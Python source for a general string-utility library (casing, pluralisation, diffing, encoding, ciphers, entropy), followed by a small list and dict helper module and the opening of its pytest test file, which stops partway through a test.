import re
import string
import sys
from typing import Any, Iterable, List, Tuple, Union
import unicodedata

# from textblob import TextBlob


# TODO: add a function to get a substring between two given characters
# TODO: write function to split a given string up into subparts of a given length

NO_ISASCII_AVAILABLE = sys.version_info.major == 3 and sys.version_info.minor <= 6


def string_chars_at_start(string: str, chars: Iterable) -> Iterable[str]:
    """."""
    for char in string:
        if char in chars:
            yield char
        else:
            break


def string_chars_at_start_len(string: str, chars: Iterable) -> int:
    """."""
    return len(list(string_chars_at_start(string, chars)))


def a10n(string: str) -> str:
    """."""
    if len(string) <= 3:
        return string

    abbreviation = f'{string[0]}{len(string[1:-1])}{string[-1]}'
    return abbreviation


def string_remove_index(string: str, index: int) -> str:
    """Remove the item from the string at the given index."""
    string_list = list(string)
    del string_list[index]
    return ''.join(string_list)


def string_replace_index(string: str, index: int, replacement: str) -> str:
    """Replace the character in the string at the given index with the replacement."""
    string_list = list(string)
    string_list[index] = replacement
    return ''.join(string_list)


# def _string_blobify(string: str) -> TextBlob:
#     """Return a textblob for the given string."""
#     return TextBlob(string)


# def string_words(string: str) -> List[str]:
#     blob = _string_blobify(string)
#     return blob.words


def string_remove_before(string: str, stop_string: str):
    """Remove everything from the start of the given string until the stop_string."""
    # we have to re-add the stop_string because otherwise it would not be included
    return f'{stop_string}{string.split(stop_string, maxsplit=1)[-1]}'


def string_remove_after(string: str, start_string: str):
    """Remove everything after the start_string to the end of the given string."""
    split_string = string.split(start_string)
    if len(split_string) > 1:
        # we have to re-add the start_string to the next-to-last item, otherwise, it will not be included
        split_string[-2] += start_string
    return text_join(start_string, *split_string[:-1])


def string_is_palindrome(string: str) -> bool:
    """Return whether or not the given string is a palindrome."""
    is_palindrome = string == string_reverse(string)
    return is_palindrome


def string_reverse(string: str) -> str:
    """Reverse the given string."""
    return string[::-1]


def indefinite_article(word):
    """Return the word with the appropriate indefinite article."""
    inflect_engine = _inflect_engine()
    return inflect_engine.a(word).split(' ')[0]


def is_plural(possible_plural: str) -> bool:
    """Return whether or not the possible_plural is plural."""
    plural = False
    inflect_engine = _inflect_engine()
    pluralized_word = inflect_engine.plural(possible_plural)
    # for possible results from inflect_engine.compare, see https://github.com/jazzband/inflect/blob/master/inflect.py
    result = inflect_engine.compare(possible_plural, pluralized_word)
    if ':' in result:
        first_char = result.split(':')[0]
        if first_char == 'p':
            plural = True
    return plural


def pluralize(word: str) -> str:
    """Make the word plural."""
    inflect_engine = _inflect_engine()
    if is_plural(word):
        return word
    else:
        return inflect_engine.plural(word)


def is_singular(possible_singular: str) -> bool:
    """Return whether or not the possible_singular is singular."""
    # this is a repetition of the code from the is_plural function and does not simply return `not is_plural` because...
    # there are many different responses possible from inflect_engine.compare and there are cases where inflect_engine.compare...
    # cannot compare the two words
    singular = False
    inflect_engine = _inflect_engine()
    pluralized_word = inflect_engine.plural(possible_singular)
    # for possible results from inflect_engine.compare, see https://github.com/jazzband/inflect/blob/master/inflect.py
    result = inflect_engine.compare(possible_singular, pluralized_word)
    if ':' in result:
        first_char = result.split(':')[0]
        if first_char == 's':
            singular = True
    return singular


def singularize(word: str) -> str:
    """Make the word singular."""
    inflect_engine = _inflect_engine()
    if is_singular(word):
        return word
    else:
        return inflect_engine.singular_noun(word)


def cardinalize(word: str, count: int) -> str:
    """Return the appropriate form of the given word for the count."""
    inflect_engine = _inflect_engine()
    if is_singular(word):
        # if the word is singular and the count is one, we can return the word
        if count == 1:
            return word
        word = pluralize(word)
    # I know this is using the singular_noun function, but it will return either singular or plural nouns based on the count argument
    return inflect_engine.singular_noun(word, count=count)


def ordinalize(number: int) -> str:
    """Return the appropriate form for the ordinal form of the given number."""
    inflect_engine = _inflect_engine()
    return inflect_engine.ordinal(number)


def string_forms(text):
    """Return multiple forms for the given text."""
    # it is important to lowercase the text before we start so that we can avoid problems when making the text plural
    text = lowercase(text)

    # TODO: may want to standardize casing of the keys... `uppercase` vs. `kebab_case`... either `uppercase` should be `upperCase` or `kebab_case` should be `kebabcase`
    string_forms = {
        'lowercase': lowercase(text),
        'titlecase': titlecase(text),
        'uppercase': uppercase(text),
        'lowercasePlural': lowercase(pluralize(text)),
        'titlecasePlural': titlecase(pluralize(text)),
        'uppercasePlural': uppercase(pluralize(text)),
        'kebab_case': kebab_case(text),
        'kebab_casePlural': kebab_case(pluralize(text)),
        'snake_case': snake_case(text),
        'snake_casePlural': snake_case(pluralize(text)),
        'camel_case': camel_case(text),
        'camel_casePlural': camel_case(pluralize(text)),
        'pascal_case': pascal_case(text),
        'pascal_casePlural': pascal_case(pluralize(text)),
        'lowercaseIndefiniteArticle': lowercase(indefinite_article(text)),
        'titlecaseIndefiniteArticle': titlecase(indefinite_article(text)),
        'uppercaseIndefiniteArticle': uppercase(indefinite_article(text)),
    }

    return string_forms


def _inflect_engine():
    """Return an inflect engine."""
    import inflect

    p = inflect.engine()
    return p


def string_left_pad(string, length: int, *, padding_characters=' '):
    """Pad the given string with the given padding_characters such that the length of the resulting string is equal to the `length` argument. Adapted from the javascript code here: https://www.theregister.co.uk/2016/03/23/npm_left_pad_chaos/."""
    from .strings_temp_utils import number_evenly_divides

    padding_length = length - len(string)

    if padding_length and not number_evenly_divides(len(padding_characters), padding_length):
        message = f'The length of the padding_characters ({len(padding_characters)}) must evenly divide the desired length of the final string ({length}).'
        raise ValueError(message)
    else:
        padding_length = int(padding_length / len(padding_characters))

    left_padded_string = padding_characters * padding_length + string

    return left_padded_string


def string_to_bool(string: str) -> bool:
    """."""
    if lowercase(string) == 'false':
        return False
    else:
        return True


def text_examples(n=10):
    """Create n example texts."""
    from hypothesis.strategies import text

    from democritus_hypothesis import hypothesis_get_strategy_results

    return hypothesis_get_strategy_results(text, n=n)


def string_has_multiple_consecutive_spaces(string):
    """Return True if the given string has multiple, consecutive spaces."""
    pattern = '.*  +.*'
    match_result = re.match(pattern, string)
    return bool(match_result)


def character_examples(n=10):
    """Create n example characters."""
    from hypothesis.strategies import characters

    from democritus_hypothesis import hypothesis_get_strategy_results

    return hypothesis_get_strategy_results(characters, n=n)


def text_abbreviate(text):
    """Abbreviate the given text."""
    if ' ' not in text:
        # split the word based on uppercased characters
        words = string_split_on_uppercase(text, include_uppercase_characters=True)
    else:
        words = text.split(' ')

    first_letters_of_sufficiently_long_words = [word[0] for word in words if len(word) > 3]
    return ''.join(first_letters_of_sufficiently_long_words).upper()


def text_input_is_yes(message):
    """Get yes/no input from the user and return `True` if the input is yes and `False` if the input is no."""
    message = text_ensure_ends_with(message.rstrip('.').rstrip('?'), ' (y/n)')
    result = input(message).strip()
    return string_is_yes(result)


def text_input_is_no(message):
    """Get yes/no input from the user and return `True` if the input is no and `False` if the input is yes."""
    message = text_ensure_ends_with(message.rstrip('.').rstrip('?'), ' (y/n)')
    result = input(message).strip()
    return string_is_no(result)


def string_is_yes(string):
    """Check if a string is some form of `y` or `yes`."""
    if lowercase(string) == 'y' or lowercase(string) == 'yes':
        return True
    else:
        return False


def string_is_no(string):
    """Check if a string is some form of `n` or `no`."""
    if lowercase(string) == 'n' or lowercase(string) == 'no':
        return True
    else:
        return False


def xor(message, key):
    """."""
    # credits for inspiration to https://stackoverflow.com/a/25475760 and https://en.wikipedia.org/wiki/XOR_cipher#Example_implementation
    from itertools import cycle

    if isinstance(message, str):
        # Text strings contain single characters
        return "".join(chr(ord(a) ^ ord(b)) for a, b in zip(message, cycle(key)))
    else:
        # Python 3 bytes objects contain integer values in the range 0-255
        return bytes_decode_as_string(bytes([a ^ b for a, b in zip(message, cycle(key))]))


def text_join(join_character, *args):
    """Join all of the arguments around the given join_character."""
    sections_to_join = []

    for arg in args:
        sections_to_join.append(arg)

    return join_character.join(sections_to_join)


def string_insert(existing_string, new_string, index):
    """Insert the new_string into the existing_string at the given index."""
    first_section = existing_string[:index]
    second_section = existing_string[index:]
    complete_string = new_string.join([first_section, second_section])
    return complete_string


def base64_encode(input_string):
    """Base64 encode the string."""
    import base64

    return bytes_decode_as_string(base64.b64encode(string_encode_as_bytes(input_string)))


def base64_decode(input_string):
    """Base64 decode the string."""
    import base64

    return bytes_decode_as_string(base64.b64decode(input_string), 'latin-1')


def string_sequence_matcher(string_a, string_b):
    """Create a difflib.SequenceMatcher for the given string."""
    import difflib

    return difflib.SequenceMatcher(None, string_a, string_b)


def strings_diff(string_a, string_b):
    """Return the diff of the two strings."""
    import difflib

    if not isinstance(string_a, list):
        string_a = string_a.splitlines()

    if not isinstance(string_b, list):
        string_b = string_b.splitlines()

    d = difflib.Differ()
    diff = d.compare(string_a, string_b)
    return '\n'.join(diff)


def string_add_to_start_of_each_line(string: str, string_to_add_to_each_line: str):
    """Add the given string_to_add_to_each_line to the beginning of each line in the string."""
    replacement = f'\n{string_to_add_to_each_line}'
    string_with_added_value = re.sub('\n', replacement, string)
    return string_with_added_value


def string_get_closes_matches(word, possible_matches, maximum_matches=3, cutoff=0.6):
    """Return the words from the list of possible matches that are closest to the given word."""
    import difflib

    return difflib.get_close_matches(word, possible_matches, n=maximum_matches, cutoff=cutoff)


# TODO: this can also be used for fuzzy matching... add a tag/rename the function to capture this possibility
def strings_similarity(a: str, b: str):
    """Return the ratio of similarity between the two strings."""
    sequence_matcher = string_sequence_matcher(a, b)

    return sequence_matcher.ratio()


def strings_matching_blocks(a: str, b: str):
    """Return the matching blocks in the given strings."""
    sequence_matcher = string_sequence_matcher(a, b)

    # this function has to be run first so that the sequence_matcher.matching_blocks property is populated
    sequence_matcher.get_opcodes()

    return sequence_matcher.matching_blocks


def strings_longest_matching_block(a: str, b: str):
    """Return the longest matching block in the string."""
    sequence_matcher = string_sequence_matcher(a, b)

    return sequence_matcher.find_longest_match(0, len(sequence_matcher.a), 0, len(sequence_matcher.b))


# TODO: I think I want to singularize the strings_... functions
def strings_diff_opcodes(a: str, b: str):
    """Return the opcodes representing the differences/similarities between two strings."""
    sequence_matcher = string_sequence_matcher(a, b)

    return [i for i in sequence_matcher.get_opcodes()]


def string_common_prefix(a: str, b: str) -> str:
    """Returns the common prefix string from left to right between a and b."""
    from .strings_temp_utils import shortest

    common_prefix = ''

    for index in range(len(shortest([a, b]))):
        if a[index] == b[index]:
            common_prefix += a[index]
        else:
            break

    return common_prefix


def string_common_suffix(a: str, b: str):
    """Returns the common suffix string from left to right between a and b."""
    return string_reverse(string_common_prefix(string_reverse(a), string_reverse(b)))


def characters(input_string):
    """Return all of the characters in the given string."""
    return tuple(input_string)


def hex_to_string(hex_string):
    """Convert the given hex string to ascii."""
    hex_string = hex_string.replace('0x', '').replace(',', '').replace(' ', '')

    return bytes_decode_as_string(bytes.fromhex(hex_string), 'latin-1')


def string_to_hex(ascii_string: str, seperator='') -> str:
    """Convert the given ascii string to hex."""
    hex_string = ''
    for char in ascii_string:
        hex_string += str(hex(character_to_unicode_number(char))).split('x')[-1] + seperator
    hex_string = hex_string.strip(seperator)
    return hex_string


def character_to_unicode_number(character):
    """Convert the given character to its Unicode number. This is the same as the `ord` function in python."""
    return ord(character)


def unicode_number_to_character(unicode_number):
    """Convert the given unicode_number to it's unicode character form. This is the same as the `chr` function in python."""
    return chr(unicode_number)


def hamming_distance(string_1, string_2, as_percent=False):
    """Return the number of positions at which corresponding symbols in string_1 and string_2 are different (this is known as the Hamming Distance). See https://en.wikipedia.org/wiki/Hamming_distance."""
    from .strings_temp_utils import percent

    if len(string_1) != len(string_2):
        raise ValueError('The length of the two strings must be the same')

    hamming_distance = sum(el1 != el2 for el1, el2 in zip(string_1, string_2))

    if as_percent:
        return percent(hamming_distance / len(string_1))
    else:
        return hamming_distance


def from_char_code(integer_list):
    """."""
    return ''.join([chr(int(integer)) for integer in integer_list])


def text_ascii_characters(text: str) -> Tuple[str]:
    """."""
    if NO_ISASCII_AVAILABLE:
        for char in text:
            try:
                char.encode('ascii')
            except UnicodeEncodeError:
                pass  # string is not ascii
            else:
                yield char  # string is ascii
    else:
        for char in text:
            if char.isascii():
                yield char


def text_non_ascii_characters(text: str) -> Tuple[str]:
    """."""
    if NO_ISASCII_AVAILABLE:
        for char in text:
            try:
                char.encode('ascii')
            except UnicodeEncodeError:
                yield char  # string is not ascii
            else:
                pass  # string is ascii
    else:
        for char in text:
            if not char.isascii():
                yield char


# TODO: rename this function
def letter_as_number(letter):
    """."""
    return string.ascii_lowercase.index(lowercase(letter)) + 1


def letter_frequency(letter, text):
    """Find the frequency of the given letter in the given text."""
    return text.count(letter) / len(text)


def string_entropy(text, ignore_case=False):
    """Find the shannon entropy of the text. Inspired by the algorithm here https://web.archive.org/web/20160320142455/https://deadhacker.com/2007/05/13/finding-entropy-in-binary-files/. You can see more here: https://en.wikipedia.org/wiki/Entropy_(information_theory)"""
    import math

    from .strings_temp_utils import deduplicate

    if ignore_case:
        text = text.lower()

    character_code_set = deduplicate([ord(char) for char in text])

    if not text:
        return 0
    entropy = 0
    for char_code in character_code_set:
        p_char = letter_frequency(chr(char_code), text)
        if p_char > 0:
            entropy += -p_char * math.log(p_char, 2)
    return entropy


def substrings(iterable):
    """Find all substrings in the given string."""
    import more_itertools

    return more_itertools.substrings(iterable)


def string_remove_non_alphabetic_characters(string: str):
    """."""
    pass


def string_remove_non_numeric_characters(string: str):
    """."""
    pass


def string_remove_non_alpha_numeric_characters(string: str):
    """."""
    pattern = '[^a-zA-Z\d\s]'
    string_after_removal = string_remove(pattern, string)
    return string_after_removal


def string_remove(regex_pattern, input_string, **kwargs):
    """Remove the regex_pattern from the input_string."""
    string_after_removal = re.sub(regex_pattern, '', input_string, **kwargs)
    return string_after_removal


def string_remove_unicode(string: str):
    """Remove all Unicode characters from the given string."""
    string_with_unicode_removed = bytes_decode_as_string(
        string_encode_as_bytes(string, encoding='ascii', errors='ignore')
    )
    return string_with_unicode_removed


def string_remove_numbers(input_string: str, replacement: str = ' '):
    """Remove all numbers from the input_strings."""
    new_string_without_numbers = re.sub('\d+', replacement, input_string)
    return new_string_without_numbers


def string_remove_from_start(input_string, string_to_remove):
    """Remove the string_to_remove from the start of the input_string."""
    if input_string.startswith(string_to_remove):
        updated_string = string_remove(string_to_remove, input_string, count=1)
        return updated_string
    else:
        return input_string


def string_remove_from_end(input_string, string_to_remove):
    """Remove the string_to_remove from the end of the input_string."""
    if input_string.endswith(string_to_remove):
        desired_string_final_index = len(input_string) - len(string_to_remove)
        updated_string = input_string[:desired_string_final_index]
        return updated_string
    else:
        return input_string


def string_as_numbers(input_string: str):
    """."""
    character_list = list(input_string)
    numbers = []
    for char in character_list:
        numbers.append(letter_as_number(char))
    return numbers


def string_in_iterable_fuzzy(input_string, iterable):
    """Find if the given input_string is in one of the strings in an iterable."""
    for item in iterable:
        if input_string in item:
            return True
    return False


# TODO: I'd like to improve this function to offer more granularity (e.g. offer a flag whether or not the match should be greedy)
def string_find_between(input_string: str, start_string: str, end_string: str, *args):
    """Find the string in the input_string that is between the start_string and the end_string."""
    regex = f'{re.escape(start_string)}(.*){re.escape(end_string)}'
    result = re.findall(regex, input_string, *args)
    if result:
        return result[0]
    else:
        return ''


def switch(a, b, text):
    """Switch a and b in the text."""
    from democritus_uuids import uuid4

    a_replacement = str(uuid4())
    b_replacement = str(uuid4())

    text = text.replace(a, a_replacement)
    text = text.replace(b, b_replacement)

    text = text.replace(a_replacement, b)
    text = text.replace(b_replacement, a)

    return text


def string_encode_as_bytes(input_string, encoding='utf-8', **kwargs):
    if isinstance(input_string, str):
        return input_string.encode(encoding, **kwargs)
    else:
        return input_string


def bytes_decode_as_string(bytes_text, encoding='utf-8', **kwargs):
    if isinstance(bytes_text, bytes):
        return bytes_text.decode(encoding, **kwargs)
    else:
        return bytes_text


def string_shorten(input_string, length, suffix='...'):
    """Shorten the given input_string to the given length."""
    if len(input_string) > length:
        return '{}{}'.format(input_string[: length - len(suffix)], suffix)
    else:
        return input_string


def string_split_without_empty(input_string, split_char):
    """Split a input_string on split_char and remove empty entries."""
    from .strings_temp_utils import list_delete_empty_items

    return list_delete_empty_items(input_string.split(split_char))


def string_has_index(string: str, index: Union[str, int]) -> bool:
    """."""
    from .strings_temp_utils import list_has_index

    string_characters = characters(string)
    has_index = list_has_index(string_characters, index)
    return has_index


def string_split_on_uppercase(input_string: str, include_uppercase_characters=False, split_acronyms=True):
    """Split the input_string on uppercase characters. If split_acronyms is False, the function will not split consecutive uppercase letters."""
    from .strings_temp_utils import list_delete_empty_items

    if not split_acronyms and not include_uppercase_characters:
        message = 'If you set the `split_acronyms` to False when calling the `string_split_on_uppercase` function, you must also set the `include_uppercase_characters` (which you did not). The function will continue, but the `split_acronyms` argument will make no difference.'
        raise ValueError(message)

    uppercase_char_array = [char.isupper() for char in input_string]
    split_string = []
    last_uppercase_character_index = 0

    for index, character_is_upper in enumerate(uppercase_char_array):
        if character_is_upper:
            # if we are not splitting acronyms, check to see if the character is part of an acronym
            if include_uppercase_characters and not split_acronyms:
                previous_character_is_upper = uppercase_char_array[index - 1]
                # if the capital letter is preceded and followed by an uppercase letter, continue
                if previous_character_is_upper:
                    # continue to the next character
                    continue

            # if the first character in the input_string is uppercase (index == 0), we don't need to append anything
            if index > 0:
                split_string.append(input_string[last_uppercase_character_index:index])

            if include_uppercase_characters:
                last_uppercase_character_index = index
            else:
                last_uppercase_character_index = index + 1

    split_string.append(input_string[last_uppercase_character_index:])

    # we are using the list_delete_empty_items function b/c if include_uppercase_characters is False and the last character of the input_string is uppercase, an empty string will be erroneously included in the response from this function
    return list_delete_empty_items(split_string)


def string_split_on_lowercase(input_string, include_lowercase_characters=False):
    """Split the string on lowercase characters."""
    from .strings_temp_utils import list_delete_empty_items

    split_string = []
    last_lowercase_character_index = 0

    for index, character in enumerate(input_string):
        if character.islower():
            # if the first character in the string is lowercase (index == 0), we don't need to append anything
            if index > 0:
                split_string.append(input_string[last_lowercase_character_index:index])

            if include_lowercase_characters:
                last_lowercase_character_index = index
            else:
                last_lowercase_character_index = index + 1

    split_string.append(input_string[last_lowercase_character_index:])

    # see the note from the string_split_on_uppercase function
    return list_delete_empty_items(split_string)


def string_split_multiple(string, *splitting_characters):
    """Split a string up based on multiple splitting_characters."""
    split_strings = []

    if splitting_characters:
        # split the string based on the first character we are splitting on
        first_splitting_character = splitting_characters[0]
        split_string = string.split(first_splitting_character)

        # record the other splitting characters
        other_splitting_characters = splitting_characters[1:]

        # split each substring based on the other_splitting_characters and record the results
        for substring in split_string:
            split_strings.extend(string_split_multiple(substring, *other_splitting_characters))
    else:
        # if there are no more characters to split on, record the string - we're done!
        split_strings.append(string)
    return split_strings


def string_reverse_case(input_string):
    """Make lowercase characters uppercased and visa-versa."""
    string_list = []

    for character in characters(input_string):
        if character.isupper():
            string_list.append(lowercase(character))
        elif character.islower():
            string_list.append(uppercase(character))
        else:
            string_list.append(character)

    return ''.join(string_list)


def text_vowels(text):
    """Return all of the vowels in the text."""
    vowels = []
    for character in text:
        if character in 'aeiou':
            vowels.append(character)
    return vowels


def text_vowel_count(text):
    """Count the number of vowels in the text."""
    vowels = text_vowels(text)
    return len(vowels)


def text_consonants(text):
    """Return all of the consonants in the text."""
    consonants = []
    for character in text:
        if character not in 'aeiou':
            consonants.append(character)
    return consonants


def text_consonant_count(text):
    """Count the number of consonants in the text."""
    consonants = text_consonants(text)
    return len(consonants)


def text_input(message='Enter/Paste your content.'):
    """."""
    # TODO: multiline support is nice, but it breaks jupyter notebooks
    print('{} (<NEWLINE> + Ctrl-D or Ctrl-Z ( windows ) to save it)'.format(message))
    contents = []
    while True:
        try:
            line = input()
        except EOFError:
            break
        contents.append(line)
    return '\n'.join(contents)


def text_ensure_starts_with(text: str, prefix: str):
    """Make sure the given text starts with the given prefix."""
    if text.startswith(prefix):
        return text
    else:
        return '{}{}'.format(prefix, text)


def text_ensure_ends_with(text: str, suffix: str):
    """Make sure the given text ends with the given suffix."""
    if text.endswith(suffix):
        return text
    else:
        return '{}{}'.format(text, suffix)


def titlecase(item):
    return _handle_casing(item, 'title')


def uppercase(item):
    return _handle_casing(item, 'upper')


def uppercase_first_letter(text):
    """Make the first letter of the text uppercase."""
    return '{}{}'.format(text[0].upper(), text[1:])


def lowercase_first_letter(text):
    """Make the first letter of the text lowercase."""
    return '{}{}'.format(text[0].lower(), text[1:])


def crazycase(text):
    """Make the case of the characters in the given text pseudo-random"""
    import random

    new_text = ''

    for character in text:
        if character in string.ascii_letters:
            casing_options = (lowercase, uppercase)
            casing_action = random.choice(casing_options)
            character = casing_action(character)
        new_text += character

    return new_text


def kebab_case(text):
    """Return the text with a "-" in place of every space."""
    text = text.replace(' ', '-')
    text = text.replace('_', '-')

    return text


def snake_case(text):
    """Return the text with a "_" in place of every space."""
    text = text.replace(' ', '_')
    text = text.replace('-', '_')

    return text


def camel_case(text: str):
    """Return the text with no spaces and every word (except the first one) capitalized."""
    text = text.replace('-', ' ')
    text = text.replace('_', ' ')
    text_list = [word.title() for word in text.split()]
    text_list[0] = text_list[0].lower()

    return ''.join(text_list)


def pascal_case(text: str):
    """Return the text with no spaces and every word capitalized."""
    text_list = [word.title() for word in text.split()]

    return ''.join(text_list)


def sentence_case(text: str):
    """."""
    # TODO: does this already exist?
    raise NotImplementedError


def uppercase_count(text):
    """Count the number of uppercase letters in the given text."""
    return sum([1 for char in text if char.isupper()])


def lowercase_count(text):
    """Count the number of lowercase letters in the given text."""
    return sum([1 for char in text if char.islower()])


def lowercase(item):
    return _handle_casing(item, 'lower')


# TODO: we should be able to validate the values of the `casing` argument
def _handle_casing(item, casing):
    available_casing_types = ('lower', 'title', 'upper')
    if casing not in available_casing_types:
        message = '! Invalid casing type given: {}\nAvailable casing types are: {}'.format(
            casing, available_casing_types
        )
        raise ValueError(message)
    if isinstance(item, str) or isinstance(item, bytes):
        return eval('item.{}()'.format(casing))
    else:
        print('! Democritus cannot yet {}-case an item of type {}'.format(casing, type(item)))
        return item


def string_rotate(text, rot=13):
    """Return the text converted using a Caesar cipher (https://en.wikipedia.org/wiki/Caesar_cipher) in which the text is rotated by the given amount (using the `rot` argument)."""
    # credit for the algorithm: https://github.com/python/cpython/blob/master/Lib/this.py
    d = {}
    for c in (65, 97):
        for i in range(26):
            d[chr(i + c)] = chr((i + rot) % 26 + c)

    return "".join([d.get(c, c) for c in text])


def text_is_english_sentence(text: str) -> bool:
    """Determine whether or not the sentence is likely English."""
    language_detection_data = text_languages(text)

    if language_detection_data[0]['language'] == 'en' and language_detection_data[0]['probability'] >= 0.5:
        return True

    return False


LEET_SPEAK_CONVERSIONS = {'1': 'i', '3': 'e', '4': 'a', '5': 's', '9': 'g', '0': 'o'}


def leet_speak_to_text(leet_speak_text):
    """."""
    translated_text = ''

    for char in leet_speak_text:
        translated_text += LEET_SPEAK_CONVERSIONS.get(char, char)

    return translated_text


def text_to_leet_speak(text):
    """."""
    from .strings_temp_utils import dict_flip, dict_delistify_values

    conversion_dict = dict_flip(LEET_SPEAK_CONVERSIONS)
    conversion_dict = dict_delistify_values(conversion_dict)
    translated_text = ''

    for char in text:
        translated_text += conversion_dict.get(char, char)

    return translated_text


def unicode_to_ascii(text: str):
    """Convert the text to ascii."""
    # credit to https://stackoverflow.com/questions/1207457/convert-a-unicode-string-to-a-string-in-python-containing-extra-symbols#1207479 for this one
    ascii_string = unicodedata.normalize('NFKD', text).encode('ascii', 'ignore').decode('ascii')
    return ascii_string



import functools
from typing import Dict, Iterable, List, Any, Union

PYTHON_TYPES_NOT_ALLOWED_AS_DICT_KEYS = (dict, list, set)


def deduplicate(iterable: Iterable) -> list:
    """Deduplicate the iterable."""
    # TODO: will this work for every type except for dicts???
    deduplicated_list = list(set(iterable))
    return deduplicated_list


def sort_by_length(list_arg: List[Any], **kwargs) -> List[Any]:
    """."""
    sorted_list = sorted(list_arg, key=lambda x: len(x), **kwargs)
    return sorted_list


def shortest(list_arg: list) -> Any:
    """."""
    shortest_item = sort_by_length(list_arg)[0]
    return shortest_item


def list_has_index(list_: list, index: Union[str, int]):
    """."""
    index_int = int(index)
    if index_int >= 0 and index_int <= len(list_) - 1:
        return True
    else:
        return False


def list_delete_empty_items(list_arg: list) -> list:
    """Delete items from the list_arg is the item is an empty strings, empty list, zero, False or None."""
    empty_values = ('', [], 0, False, None)
    # TODO: not sure if this is the right way to implement this
    return [i for i in list_arg if i not in empty_values]


def number_evenly_divides(a, b):
    """Return True if a evenly divides b. Otherwise, return False."""
    b_by_a_remainder = b % a
    evenly_divides = b_by_a_remainder == 0
    return evenly_divides


def percent(ratio):
    """Return the ratio as a percentage."""
    if ratio <= 1 and ratio >= 0:
        return round(ratio * 100, 2)
    else:
        # TODO: not sure what to do here
        raise RuntimeError


def is_valid_dict_key(key: Any) -> bool:
    """Return whether or not a dictionary could have the given key."""
    type_is_invalid_key = type(key) in PYTHON_TYPES_NOT_ALLOWED_AS_DICT_KEYS
    return not type_is_invalid_key


def copy_first_arg_dict(func):
    """If the first arg is a dictionary, pass a copy of the dictionary into func."""
    import copy

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        first_arg_dict = args[0]
        other_args = args[1:]

        if isinstance(first_arg_dict, dict):
            first_arg_dict_copy = copy.deepcopy(first_arg_dict)
            return func(first_arg_dict_copy, *other_args, **kwargs)
        else:
            return func(*args, **kwargs)

    return wrapper


@copy_first_arg_dict
def dict_add(dictionary: Dict[Any, List[Any]], key: Any, value: Any) -> Dict[Any, List[Any]]:
    """Add the given value to the dictionary at the given key. This function expects that all values of the dictionary parameter are lists."""
    if key in dictionary:
        if not isinstance(dictionary[key], list):
            message = f'The value at the "{key}" key in the dictionary is not a list and the dict_add function requires all values to be a list.'
            raise TypeError(message)
        dictionary[key].append(value)
    else:
        dictionary[key] = [value]
    return dictionary


def dict_flip(dictionary: dict, *, flatten_values: bool = False, flip_lists_and_sets: bool = False) -> dict:
    """Flip the dictionary's keys and values; all of the values become keys and keys become values."""
    import copy

    new_dict = {}

    for key, value in dictionary.items():
        if not is_valid_dict_key(value):
            if flip_lists_and_sets and isinstance(value, (list, set)):
                temp_dict = copy.deepcopy(new_dict)
                for i in value:
                    try:
                        temp_dict = dict_add(temp_dict, i, key)
                    except TypeError as e:
                        message = f'Unable to flip <<{value}>> because it contains items of a type which cannot be the keys for dictionaries.'
                        raise TypeError(message)
                else:
                    new_dict.update(temp_dict)
        else:
            new_dict = dict_add(new_dict, value, key)

    if flatten_values:
        new_dict = dict_delistify_values(new_dict)

    return new_dict


@copy_first_arg_dict
def dict_delistify_values(dictionary: dict) -> dict:
    """For all values in the given dictionary that are lists whose lengths are one, replace the list of length one with the value in the list."""
    # TODO: it would be nice to be able to do this iteratively throughout a dict... currently it only goes through the first level of values - adding a recursive option would be nice... would this principle apply to other functions in this library?
    for k, v in dictionary.items():
        if isinstance(v, list) and len(v) == 1:
            dictionary[k] = v[0]
    return dictionary



import concurrent.futures
import functools
import re

import pytest

from democritus_strings import (
    base64_decode,
    base64_encode,
    camel_case,
    character_to_unicode_number,
    crazycase,
    from_char_code,
    hamming_distance,
    hex_to_string,
    kebab_case,
    leet_speak_to_text,
    characters,
    letter_as_number,
    lowercase_count,
    lowercase_first_letter,
    pascal_case,
    string_encode_as_bytes,
    bytes_decode_as_string,
    snake_case,
    string_to_hex,
    string_as_numbers,
    string_entropy,
    string_get_closes_matches,
    string_in_iterable_fuzzy,
    string_reverse_case,
    string_rotate,
    strings_diff,
    strings_longest_matching_block,
    strings_matching_blocks,
    strings_diff_opcodes,
    string_shorten,
    string_split_on_lowercase,
    string_split_on_uppercase,
    string_split_without_empty,
    substrings,
    text_to_leet_speak,
    text_ensure_ends_with,
    text_join,
    unicode_number_to_character,
    uppercase_count,
    uppercase_first_letter,
    xor,
    lowercase,
    text_abbreviate,
    string_has_multiple_consecutive_spaces,
    uppercase,
    string_split_multiple,
    string_remove,
    string_remove_from_start,
    string_remove_from_end,
    string_left_pad,
    string_remove_numbers,
    string_has_index,
    string_add_to_start_of_each_line,
    string_insert,
    string_to_bool,
    string_forms,
    indefinite_article,
    pluralize,
    singularize,
    text_ascii_characters,
    text_non_ascii_characters,
    string_remove_unicode,
    string_is_palindrome,
    string_remove_before,
    string_remove_after,
    string_common_prefix,
    string_common_suffix,
    text_examples,
    character_examples,
    switch,
    text_vowels,
    text_vowel_count,
    text_consonants,
    text_consonant_count,
    string_is_yes,
    string_is_no,
    # string_words,
    strings_similarity,
    string_find_between,
    string_remove_non_alpha_numeric_characters,
    sentence_case,
    string_remove_index,
    string_replace_index,
    unicode_to_ascii,
    a10n,
    cardinalize,
    ordinalize,
    is_plural,
    is_singular,
    text_ensure_starts_with,
    string_chars_at_start,
)
from democritus_strings.strings import _handle_casing


def repeat_concurrently(n: int = 10):
    """Repeat the decorated function concurrently n times."""

    def actual_decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            import concurrent.futures

            results = []

            with concurrent.futures.ThreadPoolExecutor() as executor:
                for i in range(n):
                    function_submission = executor.submit(func, *args, **kwargs)
                    results.append(function_submission.result())

            return results

        return wrapper

    return actual_decorator


def test_string_chars_at_start_docs_1():
    result = string_chars_at_start('foobar', 'foo')
    assert list(result) == ['f', 'o', 'o']

    result = string_chars_at_start('foobar', 'fo')
    assert list(result) == ['f', 'o', 'o']

    result = string_chars_at_start('foobar', 'f')
    assert list(result) == ['f']

    result = string_chars_at_start('foobar', 'o')
    assert list(result) == []


def test_text_ensure_starts_with_1():
    assert text_ensure_starts_with('foo', 'a') == 'afoo'
    assert text_ensure_starts_with('foo', 'f') == 'foo'


def test_text_ensure_ends_with_1():
    assert text_ensure_ends_with('foo', 'b') == 'foob'
    assert text_ensure_ends_with('foo', 'o') == 'foo'


def test_is_plural_1():
    assert is_plural('dogs')
    assert not is_plural('dog')

    assert is_plural('adversaries')
    assert not is_plural('adversary')

    assert not is_plural('foo')


def test_is_singular_1():
    assert not is_singular('dogs')
